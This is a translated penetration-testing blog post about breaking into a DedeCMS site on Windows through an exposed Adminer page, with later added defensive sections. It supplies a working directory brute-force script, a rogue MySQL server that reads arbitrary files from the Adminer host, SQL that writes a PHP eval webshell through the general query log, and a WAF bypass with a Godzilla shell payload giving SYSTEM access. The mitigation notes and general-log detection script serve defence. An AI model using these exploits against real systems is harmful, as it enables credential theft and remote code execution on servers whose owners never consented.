
Notes on a chance encounter with Adminer (记一次偶遇Adminer)

Author: 血梦  Date: 2020-10-05  Category: Penetration Testing

Another dull day: I fired up the high-risk vulnerability scanner, it found nothing, so it was back to going through the sites one by one. This one ran DedeCMS on a Windows server, and every historical DedeCMS exploit I tried failed. Because the host is Windows, the backend directory can still be brute-forced with the script below. DedeCMS's upload filter calls getimagesize() on the path supplied in `_FILES[...][tmp_name]`, and on Windows a `<` in a path is treated as a wildcard, so `./d<</images/adminico.gif` resolves to `./dede/images/adminico.gif` when such a directory exists. A response that does not contain "Upload filetype not allow !" means the guessed prefix matched a real directory.

```python
import itertools
import requests

# Character set tried for the backend directory name. The last character ('#') is
# only a sentinel: reaching it in the extension loop means no character matched.
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://www.test.com/tags.php"
# On Windows '<' acts as a wildcard in the path, so "./d<</images/adminico.gif"
# matches "./dede/images/adminico.gif". DedeCMS probes tmp_name with getimagesize();
# "Upload filetype not allow !" is returned only when no existing image matched.
TEMPLATE = "./{p}<</images/adminico.gif"
data = {
    "_FILES[mochazz][tmp_name]": TEMPLATE,
    "_FILES[mochazz][name]": 0,
    "_FILES[mochazz][size]": 0,
    "_FILES[mochazz][type]": "image/gif",
}


def hit(prefix):
    """True when a directory starting with `prefix` exists under the web root."""
    data["_FILES[mochazz][tmp_name]"] = TEMPLATE.format(p=prefix)
    r = requests.post(url, data=data)
    return "Upload filetype not allow !" not in r.text and r.status_code == 200


# Phase 1: find a prefix (1 to 6 characters) that matches a directory.
for num in range(1, 7):
    if flag:
        break
    for pre in itertools.permutations(characters, num):
        pre = "".join(pre)
        print("testing", pre)
        if hit(pre):
            flag = 1
            back_dir = pre
            break
print("[+] prefix:", back_dir)

# Phase 2: extend the prefix one character at a time, up to 30 characters.
flag = 0
for i in range(30):
    if flag:
        break
    for ch in characters:
        if ch == characters[-1]:
            flag = 1          # sentinel reached: no further character matched
            break
        if hit(back_dir + ch):
            back_dir += ch
            print("[+] ", back_dir)
            break
print("backend directory:", back_dir)
```

It finished with the answer dede, which made no sense: requesting /dede/ returns a 404. Keep in mind that the probe only proves the directory exists on disk under the web root; it says nothing about whether the web server will serve it. If you do reach the backend, the admin username can be guessed with this trick:
http://www.yulegeyu.com/2018/09/20/dedecms-guess-admin-username-trick/
Out of ideas, I tried adminer.php on a whim, and it was there. The scanner's wordlist does contain adminer.php; it probably got its IP banned from probing too many paths, so don't put too much faith in scanner results.
Older Adminer (before 4.6.3) can be abused through a malicious MySQL server that reads files from the client. When Adminer connects to a host you control, your fake server answers its first query with a LOAD DATA LOCAL request instead of a result set, and the MySQL client library inside PHP sends back the contents of whatever file path the server named. The file is read with the permissions of the PHP process on the Adminer host, not on the database side.
mysql_client.py (the rogue server; the filename is the one used in the original post):

```python
# coding=utf-8
import logging
import socket
import struct
import sys

logging.basicConfig(level=logging.DEBUG)
filename = sys.argv[1]          # path on the *client* machine, e.g. F:\dede\index.php

sv = socket.socket()
sv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sv.bind(("", 3306))
sv.listen(5)
conn, address = sv.accept()
logging.info("Conn from: %r", address)

# Handshake packet (hex kept exactly as in the original script): protocol 10,
# server version "5.5.53", a 20-byte auth salt and capability flags advertising
# mysql_native_password.
conn.sendall(
    b"\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54"
    b"\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71"
    b"\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00"
)
conn.recv(9999)                 # client's handshake response; credentials are ignored
logging.info("auth okay")
# OK packet: tell the client it is authenticated, whatever it sent.
conn.sendall(b"\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
conn.recv(9999)                 # the client's first query (Adminer sends one on login)
logging.info("want file...")
# Instead of a result set, answer with a LOCAL INFILE request: 0xFB followed by the
# filename. A client that permits LOAD DATA LOCAL uploads that file's contents.
payload = b"\xfb" + filename.encode()
conn.sendall(struct.pack("<I", len(payload))[:3] + b"\x01" + payload)
# The client streams the file in framed packets and finishes with an empty packet.
buf = b""
content = b""
done = False
while not done:
    chunk = conn.recv(65536)
    if not chunk:
        break
    buf += chunk
    while len(buf) >= 4:
        length = struct.unpack("<I", buf[:3] + b"\x00")[0]
        if len(buf) < 4 + length:
            break                # wait for the rest of this packet
        if length == 0:          # empty packet: end of the file transfer
            done = True
            break
        content += buf[4:4 + length]
        buf = buf[4 + length:]
logging.info("got %d bytes:\n%s", len(content), content.decode(errors="replace"))
conn.close()
sv.close()
```

Usage: run it directly on your own server:
python3 mysql_client.py "F:\dede\index.php"
Then in Adminer enter your server's address as the host, any username and password, and click connect; the file contents show up in the script's output. Port 3306 on your server must be reachable from the target, and the path you pass is interpreted on the Adminer host, so Windows drive letters and backslashes are what you want here.
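As an added illustration (my own code, not the original post's and not Adminer's), here is the packet exchange that makes this work, simulated in memory so it runs offline. The rogue server answers the client's first query with a LOCAL INFILE request packet (first byte 0xFB, then a filename), and it is the client, not the server, that decides whether the file goes out: a client built with the CLIENT_LOCAL_FILES capability streams the contents, while a client with LOAD DATA LOCAL disabled only sends the empty end-of-data packet. The filesystem is a constructed dict standing in for the Adminer host's disk; the file names and contents in it are invented.

```python
import struct

# Protocol constants from the MySQL client/server protocol.
LOCAL_INFILE_REQUEST = 0xFB          # first byte of the server packet that asks for a file
CLIENT_LOCAL_FILES = 0x00000080      # capability flag: client permits LOAD DATA LOCAL
MAX_PAYLOAD = 0xFFFFFF               # largest payload one packet frame can carry

# Constructed stand-in for the Adminer host's filesystem (invented paths and contents).
FAKE_FS = {
    "F:\\dede\\index.php": b"<?php require_once(dirname(__FILE__).'/include/common.inc.php'); ?>",
    "F:\\data\\common.inc.php": b"<?php $cfg_dbuser = 'root'; $cfg_dbpwd = 'secret'; ?>",
}


def build_packet(seq, payload):
    """Frame a payload: 3-byte little-endian length, 1-byte sequence id, then the payload."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def parse_packets(buf):
    """Split a byte stream into (seq, payload) tuples."""
    out = []
    while len(buf) >= 4:
        length = struct.unpack("<I", buf[:3] + b"\x00")[0]
        out.append((buf[3], buf[4:4 + length]))
        buf = buf[4 + length:]
    return out


def rogue_server_reply(filename, seq=1):
    """What the rogue server sends instead of a result set for the client's first query:
    a LOCAL INFILE request naming a file on the *client* machine."""
    return build_packet(seq, bytes([LOCAL_INFILE_REQUEST]) + filename.encode())


def client_handle_reply(reply, client_caps, read_file):
    """Simulated client reaction to the server's reply. `read_file(name)` stands in for
    the real client's disk access. Returns the bytes the client writes back."""
    seq, payload = parse_packets(reply)[0]
    if not payload or payload[0] != LOCAL_INFILE_REQUEST:
        return b""                                  # ordinary result set: nothing to send
    filename = payload[1:].decode()
    out = b""
    n = seq + 1
    if client_caps & CLIENT_LOCAL_FILES:
        # Vulnerable client: it trusts the server and streams the file in data packets.
        data = read_file(filename)
        for i in range(0, len(data), MAX_PAYLOAD):
            out += build_packet(n, data[i:i + MAX_PAYLOAD])
            n += 1
    # Both variants end the transfer with an empty packet; the hardened client sends only that.
    return out + build_packet(n, b"")


def server_extract_file(client_bytes):
    """What the rogue server reconstructs: data packets up to the empty terminator."""
    data = b""
    for _, payload in parse_packets(client_bytes):
        if not payload:
            break
        data += payload
    return data


def demo(filename="F:\\data\\common.inc.php"):
    """Run the exchange once against a vulnerable and once against a hardened client."""
    reply = rogue_server_reply(filename)
    leaked = server_extract_file(client_handle_reply(reply, CLIENT_LOCAL_FILES, FAKE_FS.__getitem__))
    refused = server_extract_file(client_handle_reply(reply, 0, FAKE_FS.__getitem__))
    return leaked, refused


if __name__ == "__main__":
    leaked, refused = demo()
    print("vulnerable client leaked:", leaked)
    print("hardened client leaked:", refused)
```

The same split is the defensive check: Adminer talks to MySQL through PHP's mysqli, and what stops the upload is turning local infile off on the client side, with `mysqli_options($link, MYSQLI_OPT_LOCAL_INFILE, false)` in code or `mysqli.allow_local_infile=0` in php.ini; Adminer's own fix from 4.6.3 does this on its connections. Whether the server is trustworthy never enters into it, so a database UI that lets users type an arbitrary host must be treated as reading files on behalf of that host.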
Then it was back to reading files. First I requested a path that does not exist so the error message would reveal the web root. Since this is DedeCMS, the next target was data\common.inc.php, which holds the database credentials. It was not where the path suggested; the site turned out to sit directly on the F: drive, and reading the file from there showed the database account is root. With that I logged into adminer.php and wrote a shell through the general query log:

```sql
set global general_log=on;                            -- enable the general query log
set global general_log_file='F:\\*****\\shell.php';   -- point the log file into the web root
select '<?php eval($_POST['pwd']);?>';                -- the statement text is logged verbatim, so this line becomes the shell
```

This works because the general log records every statement as received, PHP tags included and even when the statement fails to parse, and general_log_file is not restricted by secure_file_priv, which only governs LOAD DATA and SELECT ... INTO OUTFILE. It does need an account allowed to change global variables (SUPER) and a mysqld that can write into the web root, which on a single Windows box running everything as one user is usually the case.

Unsurprisingly the last statement was blocked by a WAF. I captured the request and tested the payload piece by piece:

select '<?php ' is not blocked
select+'<?php+phpinfo();+?>' is blocked
select+'<?php+//%0Aphpinfo();+?>' gets through: a line comment followed by a newline (%0A) breaks the pattern the WAF keys on, while PHP simply treats `//` up to the newline as a comment and runs what follows.

With that bypass, write a Godzilla (哥斯拉) shell:

```sql
select '<?php //"%0A$a="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";eval%01(base64_decode%01($a));//"; ?>'
```

It connected successfully, and the shell runs as SYSTEM.
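To give the defender's side of the general-log trick above, here is an added example (my own code, not from the post) that scans general-log-style lines for the sequence the post used: the log being switched on, the log file pointed at a web-served path, and a statement carrying a PHP open tag, including one split over a newline the way the WAF bypass does it. The sample log lines are constructed for the example and follow MySQL 5.7's "Time Id Command Argument" layout; the connection id 12, the client address 203.0.113.7 and the timestamps are made up.

```python
import re

# Constructed sample in MySQL 5.7's general log layout ("Time Id Command Argument",
# tab-separated). Not a capture from the post's target: the connection id, client
# address and timestamps are invented. The last Query spans two lines because the
# statement itself contained a newline (the %0A in the WAF bypass).
SAMPLE_LOG = (
    "Time                 Id Command    Argument\n"
    "2020-10-05T08:12:01.000001Z\t   12 Connect\troot@203.0.113.7 on  using TCP/IP\n"
    "2020-10-05T08:12:02.000002Z\t   12 Query\tselect version()\n"
    "2020-10-05T08:12:03.000003Z\t   12 Query\tset global general_log=on\n"
    "2020-10-05T08:12:04.000004Z\t   12 Query\tset global general_log_file='F:\\\\www\\\\shell.php'\n"
    "2020-10-05T08:12:05.000005Z\t   12 Query\tselect '<?php //\n"
    "phpinfo(); ?>'\n"
    "2020-10-05T08:12:06.000006Z\t   12 Quit\t\n"
)

ENTRY_RE = re.compile(r"^(\S+)\t\s*(\d+) (\w+)\t(.*)$")
# Statements that move a server log file; the path is captured for the extension check.
LOG_PATH_RE = re.compile(
    r"set\s+(?:global\s+|@@global\.)?(general_log_file|slow_query_log_file|log_error)"
    r"\s*=\s*'([^']*)'", re.I)
GENERAL_LOG_ON_RE = re.compile(r"set\s+(?:global\s+|@@global\.)?general_log\s*=\s*'?(on|1)\b", re.I)
WEB_EXT_RE = re.compile(r"\.(php\d?|phtml|phar|jsp|jspx|asp|aspx)$", re.I)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.I)


def parse_general_log(text):
    """Split general-log text into entries. Lines that do not start a new entry are
    continuation lines of a multi-line statement and are appended to the previous one."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append({"time": m.group(1), "id": int(m.group(2)),
                            "command": m.group(3), "arg": m.group(4)})
        elif entries and not line.startswith("Time "):
            entries[-1]["arg"] += "\n" + line
    return entries


def analyze(text):
    """Return one finding per suspicious Query entry, in log order."""
    findings = []
    for e in parse_general_log(text):
        if e["command"] != "Query":
            continue
        stmt = e["arg"]
        if GENERAL_LOG_ON_RE.search(stmt):
            findings.append({"kind": "general_log_enabled", "id": e["id"], "stmt": stmt})
        m = LOG_PATH_RE.search(stmt)
        if m and WEB_EXT_RE.search(m.group(2)):
            findings.append({"kind": "log_file_in_webroot", "id": e["id"], "stmt": stmt,
                             "path": m.group(2)})
        if PHP_TAG_RE.search(stmt):
            # A newline inside the statement is the signature of the comment+%0A bypass.
            kind = "php_tag_split_by_newline" if "\n" in stmt else "php_tag_in_query"
            findings.append({"kind": kind, "id": e["id"], "stmt": stmt})
    return findings


def webshell_connections(text):
    """Connection ids that both redirected a log into the web root and logged PHP code:
    that combination is the general-log webshell, not a site that stores PHP in a table."""
    by_id = {}
    for f in analyze(text):
        by_id.setdefault(f["id"], set()).add(f["kind"])
    return {cid for cid, kinds in by_id.items()
            if "log_file_in_webroot" in kinds
            and kinds & {"php_tag_in_query", "php_tag_split_by_newline"}}


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["kind"], f["id"], repr(f["stmt"]))
    print("webshell via general_log on connections:", webshell_connections(SAMPLE_LOG))
```

Correlating per connection rather than per line is the point: `select '<?php` on its own is a false positive on any site that keeps PHP in a table, whereas the same session also steering general_log_file into a .php path is not. Once the attacker has redirected the log, the evidence is in the shell file rather than in the original general log, so the same rules are worth running over a proxy's query log or an audit plugin's output, and over the redirected file itself if you find one.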

